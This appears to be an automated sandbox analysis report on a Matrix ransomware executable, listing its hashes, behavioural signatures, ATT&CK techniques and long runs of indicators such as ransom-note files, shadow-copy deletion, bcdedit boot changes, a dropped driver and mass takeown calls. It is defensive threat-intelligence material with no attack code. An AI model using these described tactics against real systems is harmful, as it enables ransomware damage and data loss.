matrix | c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350

Analysis

max time kernel
149s
max time network
153s
platform
windows10_x64
resource
win10
submitted
08-10-2020 15:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
Size

1.2MB
MD5

1e1420d5a472c1f6ce8ac0e3363381eb
SHA1

bad3c0a998a65dc7ccfcaec49505f1529658993c
SHA256

c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350
SHA512

591aaeb7c497a96eb3eb61066058e78766f766211519d432a11774f75708e7fdc47f45df70092a7cb92d513229c32dd7fb43a25e8e8c59f2449586647a3bc75d

Score

10^/10

ransomware evasion upx spyware persistence matrix discovery

Malware Config

Signatures

Matrix Ransomware 1816 IoCs

Targeted ransomware with information collection and encryption functionality.

ransomware matrix

Processes:

c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe

description	ioc	process
File created	C:\Program Files\VideoLAN\VLC\locale\cgg\LC_MESSAGES\BG85_INFO.rtf	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\eu-es\BG85_INFO.rtf	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\ca-es\BG85_INFO.rtf	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\zh-tw\BG85_INFO.rtf	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\it-it\BG85_INFO.rtf	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\zh-cn\BG85_INFO.rtf	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\zh-cn\BG85_INFO.rtf	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File created	C:\Users\All Users\Microsoft\ClickToRun\ProductReleases\5A1DF312-5349-45A2-A5CA-533D6765243A\x-none.16\BG85_INFO.rtf	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File created	C:\Program Files\VideoLAN\VLC\locale\lg\LC_MESSAGES\BG85_INFO.rtf	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\sl-si\BG85_INFO.rtf	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\lib\locale\BG85_INFO.rtf	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\themes\dark\BG85_INFO.rtf	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files-select\css\BG85_INFO.rtf	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File created	C:\Users\Admin\AppData\Local\Packages\HoloCamera_cw5n1h2txyewy\Settings\BG85_INFO.rtf	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\BG85_INFO.rtf	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\id\BG85_INFO.rtf	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\root\BG85_INFO.rtf	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.zh_CN_5.5.0.165303\BG85_INFO.rtf	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File created	C:\Program Files\VideoLAN\VLC\locale\id\LC_MESSAGES\BG85_INFO.rtf	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\en-us\BG85_INFO.rtf	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Code Cache\wasm\index-dir\BG85_INFO.rtf	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\BG85_INFO.rtf	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File created	C:\Program Files\Java\jdk1.8.0_66\jre\lib\fonts\BG85_INFO.rtf	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\BG85_INFO.rtf	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\images\themes\dark\BG85_INFO.rtf	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\BG85_INFO.rtf	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\es-es\BG85_INFO.rtf	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\en-il\BG85_INFO.rtf	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\ja-jp\BG85_INFO.rtf	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\ro-ro\BG85_INFO.rtf	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File created	C:\Users\Admin\AppData\Local\Packages\Microsoft.PPIProjection_cw5n1h2txyewy\Settings\BG85_INFO.rtf	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\nb-no\BG85_INFO.rtf	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File created	C:\Program Files\Java\jre1.8.0_66\lib\fonts\BG85_INFO.rtf	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\pl-pl\BG85_INFO.rtf	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\pl-pl\BG85_INFO.rtf	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\or-IN\BG85_INFO.rtf	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\META-INF\BG85_INFO.rtf	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\sl-si\BG85_INFO.rtf	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File created	C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\qml\QtQuick\Controls.2\BG85_INFO.rtf	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File created	C:\Program Files\VideoLAN\VLC\locale\cy\LC_MESSAGES\BG85_INFO.rtf	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\zh-tw\BG85_INFO.rtf	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File created	C:\Program Files\VideoLAN\VLC\locale\sk\LC_MESSAGES\BG85_INFO.rtf	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Code Cache\js\index-dir\BG85_INFO.rtf	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File created	C:\Program Files\Java\jre1.8.0_66\lib\deploy\BG85_INFO.rtf	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\ko-kr\BG85_INFO.rtf	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\pt-br\BG85_INFO.rtf	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\BG85_INFO.rtf	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\META-INF\BG85_INFO.rtf	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\sk-sk\BG85_INFO.rtf	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File created	C:\Program Files\VideoLAN\VLC\locale\hu\LC_MESSAGES\BG85_INFO.rtf	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\hr-hr\BG85_INFO.rtf	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\sk-sk\BG85_INFO.rtf	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File created	C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Session Storage\BG85_INFO.rtf	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File created	C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{6a1cbfad-4d66-4c94-99d9-f8f199d18d7c}\BG85_INFO.rtf	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\sl-si\BG85_INFO.rtf	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\fi-fi\BG85_INFO.rtf	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\themes\dark\BG85_INFO.rtf	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\eu-es\BG85_INFO.rtf	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\pt-br\BG85_INFO.rtf	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\en-gb\BG85_INFO.rtf	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File created	C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BG85_INFO.rtf	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File created	C:\Program Files\Java\jdk1.8.0_66\db\bin\BG85_INFO.rtf	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\tr-tr\BG85_INFO.rtf	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\zh-cn\BG85_INFO.rtf	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
ransomware evasion

Inhibit System Recovery
T1490

Processes:

bcdedit.exebcdedit.exe

pid process

5304 bcdedit.exe
5352 bcdedit.exe
Drops file in Drivers directory 1 IoCs

Processes:

K9TOpZud64.exe

description ioc process

File created C:\Windows\system32\Drivers\PROCEXP152.SYS K9TOpZud64.exe

pid	process
5304	bcdedit.exe
5352	bcdedit.exe

description	ioc	process
File created	C:\Windows\system32\Drivers\PROCEXP152.SYS	K9TOpZud64.exe

Executes dropped EXE 138 IoCs

Processes:

NWCmUw1f.exeK9TOpZud.exeK9TOpZud64.exeK9TOpZud.exeK9TOpZud.exeK9TOpZud.exeK9TOpZud.exeK9TOpZud.exeK9TOpZud.exeK9TOpZud.exeK9TOpZud.exeK9TOpZud.exeK9TOpZud.exeK9TOpZud.exeK9TOpZud.exeK9TOpZud.exeK9TOpZud.exeK9TOpZud.exeK9TOpZud.exeK9TOpZud.exeK9TOpZud.exeK9TOpZud.exeK9TOpZud.exeK9TOpZud.exeK9TOpZud.exeK9TOpZud.exeK9TOpZud.exeK9TOpZud.exeK9TOpZud.exeK9TOpZud.exeK9TOpZud.exeK9TOpZud.exeK9TOpZud.exeK9TOpZud.exeK9TOpZud.exeK9TOpZud.exeK9TOpZud.exeK9TOpZud.exeK9TOpZud.exeK9TOpZud.exeK9TOpZud.exeK9TOpZud.exeK9TOpZud.exeK9TOpZud.exeK9TOpZud.exeK9TOpZud.exeK9TOpZud.exeK9TOpZud.exeK9TOpZud.exeK9TOpZud.exeK9TOpZud.exeK9TOpZud.exeK9TOpZud.exeK9TOpZud.exeK9TOpZud.exeK9TOpZud.exeK9TOpZud.exeK9TOpZud.exeK9TOpZud.exeK9TOpZud.exeK9TOpZud.exeK9TOpZud.exeK9TOpZud.exeK9TOpZud.exe

pid	process
1248	NWCmUw1f.exe
4724	K9TOpZud.exe
4804	K9TOpZud64.exe
4844	K9TOpZud.exe
4912	K9TOpZud.exe
4184	K9TOpZud.exe
4416	K9TOpZud.exe
3168	K9TOpZud.exe
3196	K9TOpZud.exe
4628	K9TOpZud.exe
4852	K9TOpZud.exe
4676	K9TOpZud.exe
4692	K9TOpZud.exe
5116	K9TOpZud.exe
4288	K9TOpZud.exe
3164	K9TOpZud.exe
3228	K9TOpZud.exe
4604	K9TOpZud.exe
4564	K9TOpZud.exe
4660	K9TOpZud.exe
4796	K9TOpZud.exe
5004	K9TOpZud.exe
4308	K9TOpZud.exe
4244	K9TOpZud.exe
4820	K9TOpZud.exe
4276	K9TOpZud.exe
4108	K9TOpZud.exe
5068	K9TOpZud.exe
4360	K9TOpZud.exe
4356	K9TOpZud.exe
4684	K9TOpZud.exe
4940	K9TOpZud.exe
4120	K9TOpZud.exe
3780	K9TOpZud.exe
4816	K9TOpZud.exe
5036	K9TOpZud.exe
4904	K9TOpZud.exe
3252	K9TOpZud.exe
4432	K9TOpZud.exe
4328	K9TOpZud.exe
3260	K9TOpZud.exe
4656	K9TOpZud.exe
4520	K9TOpZud.exe
4892	K9TOpZud.exe
3248	K9TOpZud.exe
4800	K9TOpZud.exe
3272	K9TOpZud.exe
4480	K9TOpZud.exe
5028	K9TOpZud.exe
3268	K9TOpZud.exe
4616	K9TOpZud.exe
2536	K9TOpZud.exe
2560	K9TOpZud.exe
4780	K9TOpZud.exe
2640	K9TOpZud.exe
4484	K9TOpZud.exe
4240	K9TOpZud.exe
4476	K9TOpZud.exe
268	K9TOpZud.exe
5144	K9TOpZud.exe
5184	K9TOpZud.exe
5432	K9TOpZud.exe
5456	K9TOpZud.exe
5604	K9TOpZud.exe

Modifies extensions of user files 1 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Pictures\ProtectWrite.tiff	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe

Sets service image path in registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

UPX packed file 136 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe	upx
C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe	upx
C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe	upx
C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe	upx
C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe	upx
C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe	upx
C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe	upx
C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe	upx
C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe	upx
C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe	upx
C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe	upx
C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe	upx
C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe	upx
C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe	upx
C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe	upx
C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe	upx
C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe	upx
C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe	upx
C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe	upx
C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe	upx
C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe	upx
C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe	upx
C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe	upx
C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe	upx
C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe	upx
C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe	upx
C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe	upx
C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe	upx
C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe	upx
C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe	upx
C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe	upx
C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe	upx
C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe	upx
C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe	upx
C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe	upx
C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe	upx
C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe	upx
C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe	upx
C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe	upx
C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe	upx
C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe	upx
C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe	upx
C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe	upx
C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe	upx
C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe	upx
C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe	upx
C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe	upx
C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe	upx
C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe	upx
C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe	upx
C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe	upx
C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe	upx
C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe	upx
C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe	upx
C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe	upx
C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe	upx
C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe	upx
C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe	upx
C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe	upx
C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe	upx
C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe	upx
C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe	upx
C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe	upx
C:\Users\Admin\AppData\Local\Temp\K9TOpZud.exe	upx

Modifies file permissions 1 TTPs 68 IoCs

discovery

File and Directory Permissions Modification

T1222

Processes:

takeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exe

pid	process
5008	takeown.exe
4496	takeown.exe
5404	takeown.exe
4640	takeown.exe
5080	takeown.exe
4812	takeown.exe
2648	takeown.exe
4220	takeown.exe
6136	takeown.exe
4772	takeown.exe
5876	takeown.exe
5716	takeown.exe
4344	takeown.exe
5536	takeown.exe
5928	takeown.exe
5368	takeown.exe
4712	takeown.exe
4504	takeown.exe
8	takeown.exe
5732	takeown.exe
5960	takeown.exe
4424	takeown.exe
5464	takeown.exe
5100	takeown.exe
5076	takeown.exe
4548	takeown.exe
5492	takeown.exe
5348	takeown.exe
4584	takeown.exe
4888	takeown.exe
5460	takeown.exe
5516	takeown.exe
4412	takeown.exe
5648	takeown.exe
5528	takeown.exe
5172	takeown.exe
4948	takeown.exe
5568	takeown.exe
5576	takeown.exe
5052	takeown.exe
2468	takeown.exe
5944	takeown.exe
5132	takeown.exe
5308	takeown.exe
5444	takeown.exe
4688	takeown.exe
5372	takeown.exe
4920	takeown.exe
248	takeown.exe
5724	takeown.exe
6016	takeown.exe
4452	takeown.exe
5360	takeown.exe
5912	takeown.exe
5208	takeown.exe
6080	takeown.exe
4236	takeown.exe
4508	takeown.exe
4280	takeown.exe
4896	takeown.exe
640	takeown.exe
5084	takeown.exe
2980	takeown.exe
6048	takeown.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware

Data from Local System
T1005

Credentials in Files
T1081

Drops desktop.ini file(s) 26 IoCs

Processes:

c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe

description	ioc	process
File opened for modification	C:\Users\Public\Desktop\desktop.ini	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File opened for modification	C:\Users\Admin\OneDrive\desktop.ini	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File opened for modification	C:\Users\Public\AccountPictures\desktop.ini	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File opened for modification	C:\Users\Public\Music\desktop.ini	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File opened for modification	C:\Users\Admin\Contacts\desktop.ini	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File opened for modification	C:\Users\Admin\Pictures\Camera Roll\desktop.ini	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File opened for modification	C:\Users\Admin\Searches\desktop.ini	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File opened for modification	C:\Users\Admin\Links\desktop.ini	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File opened for modification	C:\Users\Admin\Favorites\Links\desktop.ini	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File opened for modification	C:\Users\Public\Videos\desktop.ini	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
File opened for modification	C:\Program Files\desktop.ini	c7408dcd1b19833dc2208b3fbbba01fa3c456e91c82a0f4e65feb6ea50c9f350.exe
